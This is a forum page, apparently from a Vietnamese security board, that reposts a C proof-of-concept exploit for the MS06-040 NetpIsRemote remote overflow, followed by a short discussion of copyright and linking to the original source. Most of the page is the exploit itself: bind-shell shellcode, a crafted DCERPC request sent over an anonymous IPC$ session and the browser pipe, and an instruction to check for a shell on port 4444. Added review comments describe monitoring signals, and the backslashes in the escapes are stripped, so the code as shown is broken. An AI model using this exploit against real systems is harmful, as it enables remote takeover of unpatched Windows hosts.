<![CDATA[Latest posts for the topic "MS Windows NetpIsRemote() Remote Overflow (MS06-040)"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net MS Windows NetpIsRemote() Remote Overflow (MS06-040) Code:
/*
 * MS06-040 Remote Code Execution Proof of Concept
 *
 * Ported by ub3r st4r aka iRP
 * ---------------------------------------------------------------------
 * Tested Against:
 *  Windows XP SP1
 *  Windows 2000 SP4
 *
 * Systems Affected:
 *  Microsoft Windows 2000 SP0-SP4
 *  Microsoft Windows XP SP0-SP1
 *  Microsoft Windows NT 4.0
 * ---------------------------------------------------------------------
 * This is provided as proof-of-concept code only for educational
 * purposes and testing by authorized individuals with permission
 * to do so.
 *
 * PRIVATE v.0.2 (08-27-06)
 */

#include <stdio.h>
#include <windows.h>

#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")

// Wire-format templates and the payload blob that main() assembles into a
// single request.
// NOTE(review): as rendered on this page the backslashes of every "\xNN"
// escape have been stripped ("x05x00..."), so these literals are plain ASCII
// text rather than the byte sequences the comments describe; the listing is
// kept byte-identical here. From a monitoring standpoint the observable
// sequence is: an anonymous IPC$ session, a DCERPC bind to the interface
// UUID below (the SRVSVC interface), then an oversized opnum 0x1f request
// written to the "browser" named pipe.
// bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
unsigned char DCERPC_Bind_RPC_Service[] =
      
"x05x00x0Bx03x10x00x00x00x48x00x00x00x00x00x00x00"
      
"xD0x16xD0x16x00x00x00x00x01x00x00x00x00x00x01x00"
      
"xC8x4Fx32x4Bx70x16xD3x01x12x78x5Ax47xBFx6ExE1x88"
      
"x03x00x00x00x04x5Dx88x8AxEBx1CxC9x11x9FxE8x08x00"
       "x2Bx10x48x60x02x00x00x00";

// Leading part of the request PDU; main() copies it to the start of
// szReqBuf and then patches the count/offset fields in place.
// request windows api: NetprPathCanonicalize (0x1f)
unsigned char DCERPC_Request_RPC_Service[] =
      
"x05x00x00x03x10x00x00x00x30x08x00x00x00x00x00x00"
      
"x18x08x00x00x00x00x1fx00xffxffxffxffx01x00x00x00"
       "x00x00x00x00x01x00x00x00x00x00x00x00";

       // path ...

// Trailing part of the request; main() appends it after the path buffer.
unsigned char DCERPC_Request_RPC_Service_[] =
      
"xfax00x00x00x02x00x00x00x00x00x00x00x02x00x00x00"
       "x00x00x00x00xfax00x00x00x00x00x00x00";

// Opaque payload bytes copied into the path buffer by main(). The final
// message in main() tells the operator to look for a listener on port 4444,
// so this is presumably a bind-shell payload — not verified from this
// listing.
unsigned char sc[] =
      
"x6ax51x59xd9xeexd9x74x24xf4x5bx81x73x13xa8x97x90"
      
"x88x83xebxfcxe2xf4x29x53x6fx67x57x68xd4x74xc2x7c"
      
"xddx60x51x68x6fx77xc8x1cxfcxacx8cx1cxd5xb4x23xeb"
      
"x95xf0xa9x78x1bxc7xb0x1cxcfxa8xa9x7cxd9x03x9cx1c"
      
"x91x66x99x57x09x24x2cx57xe4x8fx69x5dx9dx89x6ax7c"
      
"x64xb3xfcxb3xb8xfdx4dx1cxcfxacxa9x7cxf6x03xa4xdc"
      
"x1bxd7xb4x96x7bx8bx84x1cx19xe4x8cx8bxf1x4bx99x4c"
      
"xf4x03xebxa7x1bxc8xa4x1cxe0x94x05x1cxd0x80xf6xff"
      
"x1exc6xa6x7bxc0x77x7exf1xc3xeexc0xa4xa2xe0xdfxe4"
      
"xa2xd7xfcx68x40xe0x63x7ax6cxb3xf8x68x46xd7x21x72"
      
"xf6x09x45x9fx92xddxc2x95x6fx58xc0x4ex99x7dx05xc0"
      
"x6fx5exfbxc4xc3xdbxfbxd4xc3xcbxfbx68x40xeexc0x86"
      
"xccxeexfbx1ex71x1dxc0x33x8axf8x6fxc0x6fx5exc2x87"
      
"xc1xddx57x47xf8x2cx05xb9x79xdfx57x41xc3xddx57x47"
      
"xf8x6dxe1x11xd9xdfx57x41xc0xdcxfcxc2x6fx58x3bxff"
      
"x77xf1x6exeexc7x77x7exc2x6fx58xcexfdxf4xeexc0xf4"
      
"xfdx01x4dxfdxc0xd1x81x5bx19x6fxc2xd3x19x6ax99x57"
      
"x63x22x56xd5xbdx76xeaxbbx03x05xd2xafx3bx23x03xff"
      
"xe2x76x1bx81x6fxfdxecx68x46xd3xffxc5xc1xd9xf9xfd"
      
"x91xd9xf9xc2xc1x77x78xffx3dx51xadx59xc3x77x7exfd"
      
"x6fx77x9fx68x40x03xffx6bx13x4cxccx68x46xdax57x47"
       "xf8x67x66x77xf0xdbx57x41x6fx58";

/*
 * Entry point. argv[1] is the target host name; argv[2] selects which
 * request layout is built (1 = Windows 2000, 2 = Windows XP). The program
 * opens an anonymous IPC$ session to the host, opens the "browser" named
 * pipe, sends the bind PDU, then writes the assembled request once.
 * Returns 0 after the write (no result is confirmed), -1 on usage,
 * connection, pipe, bind or write failure.
 *
 * NOTE(review): escape backslashes are stripped in this rendering ("n" in
 * place of "\n", 'x90' read as a multi-character constant), so the listing
 * as shown does not build as intended; it is left byte-identical.
 */
int main(int argc, char* argv[])
{
       HANDLE hFile;
       NETRESOURCE nr;

       char szRemoteName[MAX_PATH], szPipePath[MAX_PATH];

       unsigned int i;

       unsigned char szInBuf[4096];
       unsigned long dwRead, nWritten;

       unsigned char szReqBuf[2096];

       if (argc < 3){
               printf("[-] Usage: ms06040poc <host>
[target]n");
               printf("t1 - Windows 2000 SP0-SP4n");
               printf("t2 - Windows XP SP0-SP1n");
               return -1;
       }

       // Any argv[2] value other than 1 or 2 (atoi() yields 0 for
       // non-numeric input) matches neither branch below, so this
       // zero-filled buffer is what gets sent; no error is reported.
       memset(szReqBuf, 0, sizeof(szReqBuf));

       if (atoi(argv[2]) == 1) {
               unsigned char szBuff[1064];

               // build payload buffer
               memset(szBuff, 'x90', 1000);
               memcpy(szBuff+630, sc, sizeof(sc));

               for(i=1000; i<1064; i+=4) {
                       memcpy(szBuff+i, "x04x08x02x00", 4);
               }

               // build request buffer: template header, then the three
               // string-size fields patched in place, then the path buffer
               // and the trailing template.
               memcpy(szReqBuf, DCERPC_Request_RPC_Service,
sizeof(DCERPC_Request_RPC_Service)-1);
               memcpy(szReqBuf+44, "x15x02x00x00", 4); /*
max count */
               memcpy(szReqBuf+48, "x00x00x00x00", 4); /*
offset */
               memcpy(szReqBuf+52, "x15x02x00x00", 4); /*
actual count */
               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
               memcpy(szReqBuf+1120, "x00x00x00x00", 4); /*
align string */
               memcpy(szReqBuf+1124, DCERPC_Request_RPC_Service_,
sizeof(DCERPC_Request_RPC_Service_)-1);
               memcpy(szReqBuf+1140 , "xebx02", 2);
       }
       if (atoi(argv[2]) == 2) {
               unsigned char szBuff[708];

               memset(szBuff, 'x90', 612); /* size of shellcode */
               memcpy(szBuff, sc, sizeof(sc));

               memcpy(szBuff+612, "x0ax08x02x00", 4);
               memset(szBuff+616, 'A', 8); // 8 bytes padding
               memcpy(szBuff+624, "x04x08x02x00", 4);
               memset(szBuff+628, 'x90', 32);
               memcpy(szBuff+660, "x04x08x02x00", 4);
               memset(szBuff+664, 'B', 8); // 8 bytes padding
               memcpy(szBuff+672, "x04x08x02x00", 4);
               memset(szBuff+676, 'x90', 32);

               // build request buffer (same layout as the branch above
               // with smaller counts and offsets)
               memcpy(szReqBuf, DCERPC_Request_RPC_Service,
sizeof(DCERPC_Request_RPC_Service)-1);
               memcpy(szReqBuf+44, "x63x01x00x00", 4); /*
max count */
               memcpy(szReqBuf+48, "x00x00x00x00", 4); /*
offset */
               memcpy(szReqBuf+52, "x63x01x00x00", 4); /*
actual count */
               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
               memcpy(szReqBuf+764, "x00x00x00x00", 4); /*
align string */
               memcpy(szReqBuf+768, DCERPC_Request_RPC_Service_,
sizeof(DCERPC_Request_RPC_Service_)-1);
       }

       printf("[+] Connecting to %s ... n", argv[1]);

       // UNC path to the host's IPC$ share. Only four NETRESOURCE fields
       // are set; the rest stay uninitialized (WNetAddConnection2 is
       // documented to read only these four — verify against the SDK).
       _snprintf(szRemoteName, sizeof(szRemoteName),
"\\%s\ipc$", argv[1]);
       nr.dwType = RESOURCETYPE_ANY;
       nr.lpLocalName = NULL;
       nr.lpProvider = NULL;
       nr.lpRemoteName = szRemoteName;
       // Empty user name and password: an anonymous (null-session)
       // connection. Hosts that restrict anonymous IPC$ access stop the
       // program here, and such a session from an unexpected client is
       // itself an audit signal. The connection is never cancelled with
       // WNetCancelConnection2, so it persists past process exit.
       if (WNetAddConnection2(&nr, "", "", 0) !=
NO_ERROR) {
               printf("[-] Failed to connect to host !n");
               return -1;
       }

       // The RPC exchange below is carried over an SMB named pipe opened
       // as an ordinary file handle.
       _snprintf(szPipePath, sizeof(szPipePath),
"\\%s\pipe\browser", argv[1]);
       hFile = CreateFile(szPipePath, GENERIC_READ|GENERIC_WRITE, 0, NULL,
OPEN_EXISTING, 0, NULL);

       if (hFile == INVALID_HANDLE_VALUE) {
               printf("[-] Failed to open named pipe !n");
               return -1;
       }

       printf("[+] Binding to RPC interface ... n");
       // The bind reply lands in szInBuf but is never parsed (dwRead is
       // unused), so a bind_nak that still returns data is treated as
       // success.
       if (TransactNamedPipe(hFile, DCERPC_Bind_RPC_Service,
sizeof(DCERPC_Bind_RPC_Service), szInBuf, sizeof(szInBuf), &dwRead, NULL)
== 0) {
               printf("[-] Failed to bind to interface !n");
               CloseHandle(hFile);
               return -1;
       }

       printf("[+] Sending RPC request ... n");
       // Single write of the whole 2096-byte buffer; nWritten is not
       // compared against sizeof(szReqBuf), so a short write goes
       // unnoticed.
       if (!WriteFile(hFile, szReqBuf, sizeof(szReqBuf), &nWritten, 0)) {
               printf("[-] Unable to transmit RPC request
!n");
               CloseHandle(hFile);
               return -1;
       }

       // Printed unconditionally: nothing is read back from the target, so
       // "check" really means the operator must verify by hand. hFile is
       // not closed on this path; process exit reclaims it.
       printf("[+] Now check for shell on %s:4444 !n",
argv[1]);

       return 0;
}
MS Windows NetpIsRemote() Remote Overflow (MS06-040) /hvaonline/posts/list/3334.html#19410 /hvaonline/posts/list/3334.html#19410 GMT MS Windows NetpIsRemote() Remote Overflow (MS06-040)

PHUCDOAN wrote:
Copyright!!!!!!!!! Phúc còn nhớ lúc trước pác BigBall_Hacker post 1 bài tương tự nhưng nhận được sự phản ứng kịch liệt từ MOD (tạo rác cho forum) thế nhưng mời anh Conmale xem lại bài này có khác gì không? Nếu có thể chỉ cần vậy thôi: http://milw0rm.com/exploits/2265 mọi người có thể tìm đến mà 
Tớ nghĩ là dòng màu cam cũng đủ để là bản quyền ! nếu chỉ cần post link thì người đọc mất công nhấp thêm 1 click nữa rồi mới xem được ... nói chung ! Tốt nhất vừa post nội dung , vừa post link :))
/* * MS06-040 Remote Code Execution Proof of Concept * * Ported by ub3r st4r aka iRP * --------------------------------------------------------------------- * Tested Against: * Windows XP SP1 * Windows 2000 SP4 * 